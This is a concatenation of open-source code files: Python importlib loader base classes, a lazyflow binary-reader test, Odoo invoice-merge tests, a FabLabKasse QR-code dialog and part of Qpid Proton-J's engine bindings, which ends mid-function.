        The fullname is a str.  Returns a 2-tuple of (Loader, portion) where
        portion is a sequence of file system locations contributing to part of
        a namespace package. The sequence may be empty and the loader may be
        None.
        """
        raise NotImplementedError
    # Compatibility shim: maps the legacy find_module() API onto find_loader()
    # (implemented in _bootstrap).
    find_module = _bootstrap._find_module_shim
    def invalidate_caches(self):
        """An optional method for clearing the finder's cache, if any.
        This method is used by PathFinder.invalidate_caches().
        """
        # NotImplemented constant, not an exception -- see MetaPathFinder.
        return NotImplemented
# FileFinder is the stock path-entry finder.
_register(PathEntryFinder, machinery.FileFinder)
class Loader(metaclass=abc.ABCMeta):
    """Abstract base class for import loaders."""
    @abc.abstractmethod
    def load_module(self, fullname):
        """Abstract method which when implemented should load a module.
        The fullname is a str.  Returns the loaded module object."""
        raise NotImplementedError
    @abc.abstractmethod
    def module_repr(self, module):
        """Abstract method which when implemented calculates and returns the
        given module's repr."""
        raise NotImplementedError
class ResourceLoader(Loader):
    """Abstract base class for loaders which can return data from their
    back-end storage.
    This ABC represents one of the optional protocols specified by PEP 302.
    """
    @abc.abstractmethod
    def get_data(self, path):
        """Abstract method which when implemented should return the bytes for
        the specified path.  The path must be a str."""
        raise NotImplementedError
class InspectLoader(Loader):
    """Abstract base class for loaders which support inspection about the
    modules they can load.
    This ABC represents one of the optional protocols specified by PEP 302.
    """
    @abc.abstractmethod
    def is_package(self, fullname):
        """Abstract method which when implemented should return whether the
        module is a package.  The fullname is a str.  Returns a bool."""
        raise NotImplementedError
    @abc.abstractmethod
    def get_code(self, fullname):
        """Abstract method which when implemented should return the code object
        for the module.  The fullname is a str.  Returns a types.CodeType."""
        raise NotImplementedError
    @abc.abstractmethod
    def get_source(self, fullname):
        """Abstract method which should return the source code for the
        module.  The fullname is a str.  Returns a str."""
        raise NotImplementedError
# Built-in, frozen and extension loaders all support inspection.
_register(InspectLoader, machinery.BuiltinImporter, machinery.FrozenImporter,
          machinery.ExtensionFileLoader)
class ExecutionLoader(InspectLoader):
    """Abstract base class for loaders that wish to support the execution of
    modules as scripts.
    This ABC represents one of the optional protocols specified in PEP 302.
    """
    @abc.abstractmethod
    def get_filename(self, fullname):
        """Abstract method which should return the value that __file__ is to be
        set to.  The fullname is a str."""
        raise NotImplementedError
class FileLoader(_bootstrap.FileLoader, ResourceLoader, ExecutionLoader):
    """Abstract base class partially implementing the ResourceLoader and
    ExecutionLoader ABCs."""
    # All concrete behavior is inherited from _bootstrap.FileLoader.
# Both concrete file-based loaders derive their file handling from FileLoader.
_register(FileLoader, machinery.SourceFileLoader,
          machinery.SourcelessFileLoader)
class SourceLoader(_bootstrap.SourceLoader, ResourceLoader, ExecutionLoader):
    """Abstract base class for loading source code (and optionally any
    corresponding bytecode).
    To support loading from source code, the abstractmethods inherited from
    ResourceLoader and ExecutionLoader need to be implemented. To also support
    loading from bytecode, the optional methods specified directly by this ABC
    is required.
    Inherited abstractmethods not implemented in this ABC:
        * ResourceLoader.get_data
        * ExecutionLoader.get_filename
    """
    def path_mtime(self, path):
        """Return the (int) modification time for the path (str)."""
        # Delegate to path_stats() only if the subclass actually overrode it;
        # otherwise the two defaults would recurse into each other forever.
        if self.path_stats.__func__ is SourceLoader.path_stats:
            raise NotImplementedError
        return int(self.path_stats(path)['mtime'])
    def path_stats(self, path):
        """Return a metadata dict for the source pointed to by the path (str).
        Possible keys:
        - 'mtime' (mandatory) is the numeric timestamp of last source
          code modification;
        - 'size' (optional) is the size in bytes of the source code.
        """
        # Same mutual-override guard as path_mtime (see above).
        if self.path_mtime.__func__ is SourceLoader.path_mtime:
            raise NotImplementedError
        return {'mtime': self.path_mtime(path)}
    def set_data(self, path, data):
        """Write the bytes to the path (if possible).
        Accepts a str path and data as bytes.
        Any needed intermediary directories are to be created. If for some
        reason the file cannot be written because of permissions, fail
        silently.
        """
        raise NotImplementedError
# The standard source-file loader implements this ABC.
_register(SourceLoader, machinery.SourceFileLoader)
class PyLoader(SourceLoader):
    """Implement the deprecated PyLoader ABC in terms of SourceLoader.
    This class has been deprecated! It is slated for removal in Python 3.4.
    If compatibility with Python 3.1 is not needed then implement the
    SourceLoader ABC instead of this class. If Python 3.1 compatibility is
    needed, then use the following idiom to have a single class that is
    compatible with Python 3.1 onwards::
        try:
            from importlib.abc import SourceLoader
        except ImportError:
            from importlib.abc import PyLoader as SourceLoader
        class CustomLoader(SourceLoader):
            def get_filename(self, fullname):
                # Implement ...
            def source_path(self, fullname):
                '''Implement source_path in terms of get_filename.'''
                try:
                    return self.get_filename(fullname)
                except ImportError:
                    return None
            def is_package(self, fullname):
                filename = os.path.basename(self.get_filename(fullname))
                return os.path.splitext(filename)[0] == '__init__'
    """
    @abc.abstractmethod
    def is_package(self, fullname):
        raise NotImplementedError
    @abc.abstractmethod
    def source_path(self, fullname):
        """Abstract method.  Accepts a str module name and returns the path to
        the source code for the module."""
        raise NotImplementedError
    def get_filename(self, fullname):
        """Implement get_filename in terms of source_path.
        As get_filename should only return a source file path there is no
        chance of the path not existing but loading still being possible, so
        ImportError should propagate instead of being turned into returning
        None.
        """
        # The deprecation warning fires lazily, on first use, rather than at
        # class-definition time.
        warnings.warn("importlib.abc.PyLoader is deprecated and is "
                      "slated for removal in Python 3.4; "
                      "use SourceLoader instead. "
                      "See the importlib documentation on how to be "
                      "compatible with Python 3.1 onwards.",
                      DeprecationWarning)
        path = self.source_path(fullname)
        if path is None:
            raise ImportError(name=fullname)
        else:
            return path
class PyPycLoader(PyLoader):
    """Abstract base class to assist in loading source and bytecode by
    requiring only back-end storage methods to be implemented.
    This class has been deprecated! Removal is slated for Python 3.4. Implement
    the SourceLoader ABC instead. If Python 3.1 compatibility is needed, see
    PyLoader.
    The methods get_code, get_source, and load_module are implemented for the
    user.
    """
    def get_filename(self, fullname):
        """Return the source or bytecode file path."""
        # Prefer the source path; fall back to bytecode; fail otherwise.
        path = self.source_path(fullname)
        if path is not None:
            return path
        path = self.bytecode_path(fullname)
        if path is not None:
            return path
        raise ImportError("no source or bytecode path available for "
                          "{0!r}".format(fullname), name=fullname)
    def get_code(self, fullname):
        """Get a code object from source or bytecode.
        The bytecode layout parsed below is the legacy .pyc header:
        4-byte magic | 4-byte mtime | 4-byte source size | marshalled code.
        """
        warnings.warn("importlib.abc.PyPycLoader is deprecated and slated for "
                      "removal in Python 3.4; use SourceLoader instead. "
                      "If Python 3.1 compatibility is required, see the "
                      "latest documentation for PyLoader.",
                      DeprecationWarning)
        source_timestamp = self.source_mtime(fullname)
        # Try to use bytecode if it is available.
        bytecode_path = self.bytecode_path(fullname)
        if bytecode_path:
            data = self.get_data(bytecode_path)
            try:
                magic = data[:4]
                if len(magic) < 4:
                    raise ImportError(
                        "bad magic number in {}".format(fullname),
                        name=fullname, path=bytecode_path)
                raw_timestamp = data[4:8]
                if len(raw_timestamp) < 4:
                    raise EOFError("bad timestamp in {}".format(fullname))
                pyc_timestamp = _bootstrap._r_long(raw_timestamp)
                raw_source_size = data[8:12]
                if len(raw_source_size) != 4:
                    raise EOFError("bad file size in {}".format(fullname))
                # Source size is unused as the ABC does not provide a way to
                # get the size of the source ahead of reading it.
                bytecode = data[12:]
                # Verify that the magic number is valid.
                if imp.get_magic() != magic:
                    raise ImportError(
                        "bad magic number in {}".format(fullname),
                        name=fullname, path=bytecode_path)
                # Verify that the bytecode is not stale (only matters when
                # there is source to fall back on).
                if source_timestamp:
                    if pyc_timestamp < source_timestamp:
                        raise ImportError("bytecode is stale", name=fullname,
                                          path=bytecode_path)
            except (ImportError, EOFError):
                # If source is available give it a shot.
                if source_timestamp is not None:
                    pass
                else:
                    raise
            else:
                # Bytecode seems fine, so try to use it.
                return marshal.loads(bytecode)
        elif source_timestamp is None:
            raise ImportError("no source or bytecode available to create code "
                              "object for {0!r}".format(fullname),
                              name=fullname)
        # Use the source.
        source_path = self.source_path(fullname)
        if source_path is None:
            message = "a source path must exist to load {0}".format(fullname)
            raise ImportError(message, name=fullname)
        source = self.get_data(source_path)
        code_object = compile(source, source_path, 'exec', dont_inherit=True)
        # Generate bytecode and write it out.
        if not sys.dont_write_bytecode:
            data = bytearray(imp.get_magic())
            data.extend(_bootstrap._w_long(source_timestamp))
            data.extend(_bootstrap._w_long(len(source) & 0xFFFFFFFF))
            data.extend(marshal.dumps(code_object))
            self.write_bytecode(fullname, data)
        return code_object
    @abc.abstractmethod
    def source_mtime(self, fullname):
        """Abstract method. Accepts a str filename and returns an int
        modification time for the source of the module."""
        raise NotImplementedError
    @abc.abstractmethod
    def bytecode_path(self, fullname):
        """Abstract method. Accepts a str filename and returns the str pathname
        to the bytecode for the module."""
        raise NotImplementedError
    @abc.abstractmethod
    def write_bytecode(self, fullname, bytecode):
        """Abstract method. Accepts a str filename and bytes object
        representing the bytecode for the module. Returns a boolean
        representing whether the bytecode was written or not."""
        raise NotImplementedError
| gpl-3.0 |
stuarteberg/lazyflow | tests/testOpRawBinaryFileReader.py | 1 | 2714 | ###############################################################################
# lazyflow: data flow based lazy parallel computation framework
#
# Copyright (C) 2011-2014, the ilastik developers
# <team@ilastik.org>
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the Lesser GNU General Public License
# as published by the Free Software Foundation; either version 2.1
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# See the files LICENSE.lgpl2 and LICENSE.lgpl3 for full text of the
# GNU Lesser General Public License version 2.1 and 3 respectively.
# This information is also available on the ilastik web site at:
# http://ilastik.org/license/
###############################################################################
import os
import tempfile
import shutil
import numpy
from lazyflow.graph import Graph
from lazyflow.operators.ioOperators import OpRawBinaryFileReader
class TestOpRawBinaryFileReader(object):
    """Round-trip test: persist random float32 data as a raw binary file and
    read it back through OpRawBinaryFileReader."""

    def setUp(self):
        # Generate reference data and persist it via a writable memmap.
        self.testData = numpy.random.random((10, 11, 12)).astype(numpy.float32)
        self.tmpDir = tempfile.mkdtemp()
        # The reader parses shape/dtype out of the file name, so the name has
        # to follow the convention OpRawBinaryFileReader expects.
        shape_string = "-".join(str(dim) for dim in self.testData.shape)
        filename = 'random-test-data-{}-float32.bin'.format(shape_string)
        self.testDataFilePath = os.path.join(self.tmpDir, filename)
        mapped = numpy.memmap(self.testDataFilePath,
                              dtype=self.testData.dtype,
                              shape=self.testData.shape,
                              mode='w+')
        mapped[:] = self.testData
        del mapped  # drop the memmap so the data is flushed to disk

    def tearDown(self):
        shutil.rmtree(self.tmpDir)

    def test_OpRawBinaryFileReader(self):
        # Read the file back through the operator and compare to the reference.
        op = OpRawBinaryFileReader(graph=Graph())
        try:
            op.FilePath.setValue(self.testDataFilePath)
            result = op.Output[:].wait()
            assert (result == self.testData).all()
        finally:
            op.cleanUp()
if __name__ == "__main__":
    # Allow running this test module directly through nose.
    import sys
    import nose
    sys.argv.append("--nocapture") # Don't steal stdout. Show it on the console as usual.
    sys.argv.append("--nologcapture") # Don't set the logging level to DEBUG. Leave it alone.
    ret = nose.run(defaultTest=__file__)
    if not ret: sys.exit(1)
| lgpl-3.0 |
eezee-it/account-invoicing | account_invoice_merge_purchase/tests/test_account_invoice_merge_purchase.py | 3 | 8037 | # -*- coding: utf-8 -*-
##############################################################################
#
# This file is part of account_invoice_merge_purchase,
# an Odoo module.
#
# Copyright (c) 2015 ACSONE SA/NV (<http://acsone.eu>)
#
# account_invoice_merge_purchase is free software:
# you can redistribute it and/or modify it under the terms of the GNU
# Affero General Public License as published by the Free Software
# Foundation,either version 3 of the License, or (at your option) any
# later version.
#
# account_invoice_merge_purchase is distributed
# in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
# even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR
# PURPOSE. See the GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with account_invoice_merge_purchase.
# If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.tests import common
from openerp import workflow
from datetime import datetime
def create_simple_po(self, partner, invoice_method):
    """Create a one-line purchase order for *partner* with the given
    invoicing policy and return the new purchase.order record."""
    line_vals = {
        'name': 'test',
        'date_planned': datetime.today(),
        'price_unit': 10,
    }
    order_vals = {
        'partner_id': partner.id,
        'invoice_method': invoice_method,
        'location_id': self.ref('stock.stock_location_stock'),
        'pricelist_id': self.ref('purchase.list0'),
        'order_line': [(0, 0, line_vals)],
    }
    return self.po_obj.create(order_vals)
def pay_invoice(self, invoice):
    """Pay *invoice* by reconciling its payable/receivable move line with a
    write-off on the miscellaneous journal.

    :param self: the TransactionCase instance (provides env shortcuts)
    :param invoice: account.invoice record to pay
    """
    aml = self.aml_obj.search(
        [('account_id.type', 'in', ['payable', 'receivable']),
         ('invoice.id', '=', invoice.id)])
    # NOTE: a ``ctx`` dict used to be built and updated here but was never
    # passed anywhere (the wizard is created through ``with_context``
    # directly); that dead code has been removed.
    writeoff = self.writeoff_obj.with_context(active_ids=[aml.id]).create(
        {'journal_id': self.journal01.id,
         'writeoff_acc_id': self.account01.id})
    writeoff.trans_rec_reconcile()
def invoice_picking(self, picking):
    """Run the 'invoice on shipping' wizard for *picking* and return the ids
    of the invoices it created."""
    active = [picking.id]
    wizard = self.invoice_picking_wiz.with_context(active_ids=active).create({})
    return wizard.with_context(active_ids=active).create_invoice()
class TestAccountInvoiceMergePurchase(common.TransactionCase):
    """End-to-end checks that supplier invoices created from several purchase
    orders can be merged into one, and that paying the merged invoice closes
    every originating purchase order."""
    def setUp(self):
        # Shortcuts to the records and model proxies used by every test.
        super(TestAccountInvoiceMergePurchase, self).setUp()
        self.partner01 = self.env.ref('base.res_partner_1')
        self.context = self.env['res.users'].context_get()
        self.po_obj = self.env['purchase.order']
        self.inv_obj = self.env['account.invoice']
        self.aml_obj = self.env['account.move.line']
        self.journal01 = self.env.ref('account.miscellaneous_journal')
        self.account01 = self.env.ref('account.a_pay')
        self.writeoff_obj = self.env['account.move.line.reconcile.writeoff']
        self.picking_obj = self.env['stock.picking']
        self.invoice_picking_wiz = self.env['stock.invoice.onshipping']
    def test_order_multi_purchase_order(self):
        """Two 'order'-invoiced POs -> merge invoices -> pay -> POs done."""
        purchase_order01 = create_simple_po(self, self.partner01, 'order')
        # I confirm the purchase order
        workflow.trg_validate(self.uid, 'purchase.order',
                              purchase_order01.id, 'purchase_confirm',
                              self.cr)
        # I check if the purchase order is confirmed
        purchase_order01.invalidate_cache()
        self.assertEqual(purchase_order01.state, 'approved',
                         "Purchase order's state isn't correct")
        invoice_ids = purchase_order01.invoice_ids.ids
        purchase_order02 = purchase_order01.copy()
        # I confirm the second purchase order
        workflow.trg_validate(self.uid, 'purchase.order',
                              purchase_order02.id, 'purchase_confirm',
                              self.cr)
        # I check if the purchase order is confirmed
        purchase_order02.invalidate_cache()
        self.assertEqual(purchase_order02.state, 'approved',
                         "Purchase order's state isn't correct")
        invoice_ids.extend(purchase_order02.invoice_ids.ids)
        invoices = self.inv_obj.browse(invoice_ids)
        invoices_info, invoice_lines_info = invoices.do_merge()
        new_invoice_ids = invoices_info.keys()
        # Ensure there is only one new invoice
        self.assertEqual(len(new_invoice_ids), 1)
        # Check invoice_lines_info
        invoice_lines = invoices.mapped('invoice_line')
        for v in invoice_lines_info:
            for k in invoice_lines_info[v]:
                self.assertIn(k, invoice_lines._ids,
                              "Incorrect Invoice Line Mapping")
        # I post the created invoice
        workflow.trg_validate(self.uid, 'account.invoice', new_invoice_ids[0],
                              'invoice_open', self.cr)
        # I pay the merged invoice
        invoice = self.inv_obj.browse(new_invoice_ids)[0]
        pay_invoice(self, invoice)
        # I check if merge invoice is paid
        self.assertEqual(invoice.state, 'paid')
        purchase_order01.invalidate_cache()
        # I check if purchase order are done
        self.assertEqual(purchase_order01.state, 'done')
        self.assertEqual(purchase_order02.state, 'done')
    def test_picking_multi_purchase_order(self):
        """Two 'picking'-invoiced POs -> transfer pickings -> merge the
        picking-generated invoices -> pay -> POs done."""
        purchase_order01 = self.env.ref('purchase.purchase_order_1')
        # I set the invoice method to picking
        purchase_order01.invoice_method = 'picking'
        # I confirm the purchase order
        workflow.trg_validate(self.uid, 'purchase.order',
                              purchase_order01.id, 'purchase_confirm',
                              self.cr)
        # I check if the purchase order is confirmed
        purchase_order01.invalidate_cache()
        self.assertEqual(purchase_order01.state, 'approved',
                         "Purchase order's state isn't correct")
        # I check if there is a picking
        self.assertEqual(len(purchase_order01.picking_ids.ids), 1)
        picking01 = purchase_order01.picking_ids[0]
        # I transfer the picking
        picking01.do_transfer()
        invoice_ids = invoice_picking(self, picking01)
        purchase_order02 = purchase_order01.copy()
        # I set the invoice method to picking
        purchase_order02.invoice_method = 'picking'
        # I confirm the second purchase order
        workflow.trg_validate(self.uid, 'purchase.order',
                              purchase_order02.id, 'purchase_confirm',
                              self.cr)
        # I check if the purchase order is confirmed
        purchase_order02.invalidate_cache()
        self.assertEqual(purchase_order02.state, 'approved',
                         "Purchase order's state isn't correct")
        # I check if there is a picking
        self.assertEqual(len(purchase_order02.picking_ids.ids), 1)
        picking02 = purchase_order02.picking_ids[0]
        # I transfer the picking
        picking02.do_transfer()
        invoice_ids.extend(invoice_picking(self, picking02))
        invoices = self.inv_obj.browse(invoice_ids)
        invoices_info = invoices.do_merge()[0]
        new_invoice_ids = invoices_info.keys()
        # Ensure there is only one new invoice
        self.assertEqual(len(new_invoice_ids), 1)
        # I post the created invoice
        workflow.trg_validate(self.uid, 'account.invoice', new_invoice_ids[0],
                              'invoice_open', self.cr)
        # I pay the merged invoice
        invoice = self.inv_obj.browse(new_invoice_ids)[0]
        pay_invoice(self, invoice)
        # I check if merge invoice is paid
        self.assertEqual(invoice.state, 'paid')
        purchase_order01.invalidate_cache()
        # I check if purchase order are done
        self.assertEqual(purchase_order01.state, 'done')
        self.assertEqual(purchase_order02.state, 'done')
| agpl-3.0 |
fau-fablab/FabLabKasse | FabLabKasse/UI/LoadFromMobileAppDialogCode.py | 1 | 3567 | #!/usr/bin/env python2.7
# -*- coding: utf-8 -*-
#
# FabLabKasse, a Point-of-Sale Software for FabLabs and other public and trust-based workshops.
# Copyright (C) 2015 Julian Hammer <julian.hammer@fablab.fau.de>
# Maximilian Gaukler <max@fablab.fau.de>
# Timo Voigt <timo@fablab.fau.de>
# and others
#
# This program is free software: you can redistribute it and/or modify it under the terms of the GNU
# General Public License as published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
# even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License along with this program. If not,
# see <http://www.gnu.org/licenses/>.
"""dialog for loading the cart from a mobile application.
It shows a QR Code as one-time-token for authentication."""
from PyQt4 import QtGui, QtCore
from FabLabKasse.UI.uic_generated.LoadFromMobileAppDialog import Ui_LoadFromMobileAppDialog
import qrcode
import StringIO
def set_layout_items_visible(layout, visible):
    """
    Show or hide every widget contained in a QLayout, recursing into
    nested sub-layouts.

    :type layout: QtGui.QLayout
    :type visible: boolean
    """
    for index in range(layout.count()):
        item = layout.itemAt(index)
        if isinstance(item, QtGui.QLayout):
            # a nested layout carries its own items - handle them recursively
            set_layout_items_visible(item, visible)
        child = item.widget()
        if child is not None:
            child.setVisible(visible)
class LoadFromMobileAppDialog(QtGui.QDialog, Ui_LoadFromMobileAppDialog):
    """dialog for loading the cart from a mobile application.
    It shows a QR Code as one-time-token for authentication."""
    def __init__(self, parent, app_url):
        """
        :param parent: parent widget
        :param app_url: download URL for the mobile app, shown as a QR code;
            pass None to hide the app-download button entirely
        """
        QtGui.QDialog.__init__(self, parent)
        self.setupUi(self)
        # maximize window - WORKAROUND because showMaximized() doesn't work
        # when a default geometry is set in the Qt designer file
        QtCore.QTimer.singleShot(0, lambda: self.setWindowState(QtCore.Qt.WindowMaximized))
        # the app-download section stays hidden until the button is clicked
        set_layout_items_visible(self.verticalLayout_app_download, False)
        self.pushButton_app.clicked.connect(self._show_app_download)
        if app_url is None:
            self.pushButton_app.setVisible(False)
        else:
            LoadFromMobileAppDialog.set_qr_label(self.label_qr_app, app_url)
            self.label_qr_app_url.setText(app_url)
    def _show_app_download(self):
        """hide the random QR code, show the one for the appstore"""
        set_layout_items_visible(self.verticalLayout_qr, False)
        set_layout_items_visible(self.verticalLayout_app_download, True)
        self.buttonBox.setStandardButtons(QtGui.QDialogButtonBox.Ok)
    def set_random_code(self, random_code):
        """update the QR code showing the cart id"""
        LoadFromMobileAppDialog.set_qr_label(self.label_qr_random, random_code)
    @staticmethod
    def set_qr_label(label, text):
        """
        set qrcode image on QLabel
        :param label: QLabel
        :param text: text for the QR code
        """
        # render the QR code to an in-memory PNG, then load it as a pixmap
        buf = StringIO.StringIO()
        img = qrcode.make(text)
        img.save(buf, "PNG")
        # clear any designer placeholder text before showing the image
        label.setText("")
        qt_pixmap = QtGui.QPixmap()
        qt_pixmap.loadFromData(buf.getvalue(), "PNG")
        label.setPixmap(qt_pixmap)
| gpl-3.0 |
jeckersb/Proton | proton-j/src/main/resources/cengine.py | 2 | 28835 | #
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
from org.apache.qpid.proton import Proton
from org.apache.qpid.proton.amqp import Symbol
from org.apache.qpid.proton.amqp.messaging import Source, Target, \
TerminusDurability, TerminusExpiryPolicy, Received, Accepted, \
Rejected, Released, Modified
from org.apache.qpid.proton.amqp.transaction import Coordinator
from org.apache.qpid.proton.amqp.transport import ErrorCondition, \
SenderSettleMode, ReceiverSettleMode
from org.apache.qpid.proton.engine import EndpointState, Sender, \
Receiver, Transport as _Transport, TransportException
from java.util import EnumSet
from jarray import array, zeros
from cerror import *
from ccodec import *
# from proton/engine.h
# endpoint state bits: an endpoint's state is the OR of one local and
# one remote flag
PN_LOCAL_UNINIT = 1
PN_LOCAL_ACTIVE = 2
PN_LOCAL_CLOSED = 4
PN_REMOTE_UNINIT = 8
PN_REMOTE_ACTIVE = 16
PN_REMOTE_CLOSED = 32
# sender settle modes
PN_SND_UNSETTLED = 0
PN_SND_SETTLED = 1
PN_SND_MIXED = 2
# receiver settle modes
PN_RCV_FIRST = 0
PN_RCV_SECOND = 1
# terminus types
PN_UNSPECIFIED = 0
PN_SOURCE = 1
PN_TARGET = 2
PN_COORDINATOR = 3
# terminus durability levels
PN_NONDURABLE = 0
PN_CONFIGURATION = 1
PN_DELIVERIES = 2
# terminus expiry policies
PN_EXPIRE_WITH_LINK = 0
PN_EXPIRE_WITH_SESSION = 1
PN_EXPIRE_WITH_CONNECTION = 2
PN_EXPIRE_NEVER = 3
# distribution modes (source terminus only)
PN_DIST_MODE_UNSPECIFIED = 0
PN_DIST_MODE_COPY = 1
PN_DIST_MODE_MOVE = 2
# delivery outcome codes (AMQP 1.0 descriptor ids)
PN_RECEIVED = (0x0000000000000023)
PN_ACCEPTED = (0x0000000000000024)
PN_REJECTED = (0x0000000000000025)
PN_RELEASED = (0x0000000000000026)
PN_MODIFIED = (0x0000000000000027)
# transport trace levels, aliased to the Java Transport constants
PN_TRACE_OFF = _Transport.TRACE_OFF
PN_TRACE_RAW = _Transport.TRACE_RAW
PN_TRACE_FRM = _Transport.TRACE_FRM
PN_TRACE_DRV = _Transport.TRACE_DRV
def wrap(obj, wrapper):
  """Return the wrapper cached on *obj*'s context slot.

  On first use a wrapper is built via ``wrapper(obj)`` and stored with
  ``setContext`` so subsequent calls hand back the same instance.
  A falsy *obj* (e.g. None) yields None.
  """
  if not obj:
    return None
  cached = obj.getContext()
  if not cached:
    cached = wrapper(obj)
    obj.setContext(cached)
  return cached
class pn_condition:
  # Python-side mirror of an AMQP error condition: a symbolic name, a
  # human-readable description, and an info map held as pn_data.
  def __init__(self):
    self.name = None
    self.description = None
    self.info = pn_data(0)
  def decode(self, impl):
    # Populate this condition from a Java ErrorCondition, or reset all
    # fields when impl is None.
    if impl is None:
      self.name = None
      self.description = None
      self.info.clear()
    else:
      cond = impl.getCondition()
      if cond is None:
        self.name = None
      else:
        self.name = cond.toString()
      self.description = impl.getDescription()
      obj2dat(impl.getInfo(), self.info)
  def encode(self):
    # Build a Java ErrorCondition from this state; a condition without a
    # name encodes as None (i.e. "no error set").
    if self.name is None:
      return None
    else:
      impl = ErrorCondition()
      impl.setCondition(Symbol.valueOf(self.name))
      impl.setDescription(self.description)
      impl.setInfo(dat2obj(self.info))
      return impl
# Plain accessors over pn_condition, mirroring the C pn_condition_* API.
def pn_condition_is_set(cond):
  # a condition counts as "set" once it has a non-empty name
  return bool(cond.name)
def pn_condition_get_name(cond):
  return cond.name
def pn_condition_set_name(cond, name):
  cond.name = name
def pn_condition_get_description(cond):
  return cond.description
def pn_condition_set_description(cond, description):
  cond.description = description
def pn_condition_clear(cond):
  # reset name/description and drop any info entries
  cond.name = None
  cond.description = None
  cond.info.clear()
def pn_condition_info(cond):
  return cond.info
class endpoint_wrapper:
  """Common base for connection/session/link wrappers: pairs the Java
  engine object (``impl``) with per-endpoint attachments and the
  local/remote pn_condition state."""
  def __init__(self, impl):
    self.impl = impl
    self.attachments = {}
    self.condition = pn_condition()
    self.remote_condition = pn_condition()
  def on_close(self):
    # push the locally configured error condition down to the Java
    # endpoint just before it is closed
    cond = self.condition.encode()
    if cond:
      self.impl.setCondition(cond)

def remote_condition(endpoint):
  """Refresh *endpoint*'s remote pn_condition from the Java impl and
  return it.

  Bug fix: this used to be a method on endpoint_wrapper, but that
  method was unreachable (``__init__`` shadows it with the
  ``remote_condition`` attribute), while the pn_*_remote_condition()
  helpers call ``remote_condition(...)`` as a module-level function --
  which previously did not exist and raised NameError.
  """
  endpoint.remote_condition.decode(endpoint.impl.getRemoteCondition())
  return endpoint.remote_condition
class pn_connection_wrapper(endpoint_wrapper):
  # Adds the connection-open negotiation payloads (properties plus
  # offered/desired capabilities) on top of the shared endpoint state.
  def __init__(self, impl):
    endpoint_wrapper.__init__(self, impl)
    self.properties = pn_data(0)
    self.offered_capabilities = pn_data(0)
    self.desired_capabilities = pn_data(0)
def pn_connection():
  # Create a new engine connection and return its (cached) wrapper.
  return wrap(Proton.connection(), pn_connection_wrapper)
def set2mask(local, remote):
  # Collapse Java EnumSets of local/remote EndpointState into the
  # C-style PN_LOCAL_*/PN_REMOTE_* bitmask (inverse of mask2set).
  mask = 0
  if local.contains(EndpointState.UNINITIALIZED):
    mask |= PN_LOCAL_UNINIT
  if local.contains(EndpointState.ACTIVE):
    mask |= PN_LOCAL_ACTIVE
  if local.contains(EndpointState.CLOSED):
    mask |= PN_LOCAL_CLOSED
  if remote.contains(EndpointState.UNINITIALIZED):
    mask |= PN_REMOTE_UNINIT
  if remote.contains(EndpointState.ACTIVE):
    mask |= PN_REMOTE_ACTIVE
  if remote.contains(EndpointState.CLOSED):
    mask |= PN_REMOTE_CLOSED
  return mask
def endpoint_state(impl):
  # Bitmask describing a single endpoint's current local/remote states.
  return set2mask(EnumSet.of(impl.getLocalState()),
                  EnumSet.of(impl.getRemoteState()))
def pn_connection_state(conn):
  return endpoint_state(conn.impl)
def pn_connection_condition(conn):
  # local condition; populated by callers before closing
  return conn.condition
def pn_connection_remote_condition(conn):
  """Return the peer's error condition for this connection, refreshed
  from the Java impl.

  Bug fix: the original body delegated to a module-level
  ``remote_condition`` helper that was never defined (the identically
  named method on endpoint_wrapper is shadowed by the instance
  attribute), so calling this function raised NameError.
  """
  conn.remote_condition.decode(conn.impl.getRemoteCondition())
  return conn.remote_condition
def pn_connection_properties(conn):
  # locally staged properties, sent on open
  return conn.properties
def pn_connection_remote_properties(conn):
  # NOTE(review): obj2dat is called with a single argument here, unlike
  # the two-argument uses elsewhere in this file -- presumably ccodec
  # provides a default target; confirm against ccodec.obj2dat.
  return obj2dat(conn.impl.getRemoteProperties())
def pn_connection_offered_capabilities(conn):
  return conn.offered_capabilities
def pn_connection_remote_offered_capabilities(conn):
  return array2dat(conn.impl.getRemoteOfferedCapabilities(), PN_SYMBOL)
def pn_connection_desired_capabilities(conn):
  return conn.desired_capabilities
def pn_connection_remote_desired_capabilities(conn):
  return array2dat(conn.impl.getRemoteDesiredCapabilities(), PN_SYMBOL)
def pn_connection_attachments(conn):
  return conn.attachments
def pn_connection_set_container(conn, name):
  conn.impl.setContainer(name)
def pn_connection_get_container(conn):
  return conn.impl.getContainer()
def pn_connection_remote_container(conn):
  return conn.impl.getRemoteContainer()
def pn_connection_get_hostname(conn):
  return conn.impl.getHostname()
def pn_connection_set_hostname(conn, name):
  conn.impl.setHostname(name)
def pn_connection_remote_hostname(conn):
  return conn.impl.getRemoteHostname()
def pn_connection_open(conn):
  # Flush the locally staged properties/capabilities into the Java
  # connection, then open it.
  props = dat2obj(conn.properties)
  offered = dat2obj(conn.offered_capabilities)
  desired = dat2obj(conn.desired_capabilities)
  if props:
    conn.impl.setProperties(props)
  if offered:
    conn.impl.setOfferedCapabilities(array(list(offered), Symbol))
  if desired:
    conn.impl.setDesiredCapabilities(array(list(desired), Symbol))
  conn.impl.open()
def pn_connection_close(conn):
  # propagate any local error condition before closing
  conn.on_close()
  conn.impl.close()
def pn_connection_release(conn):
  conn.impl.free()
def pn_connection_transport(conn):
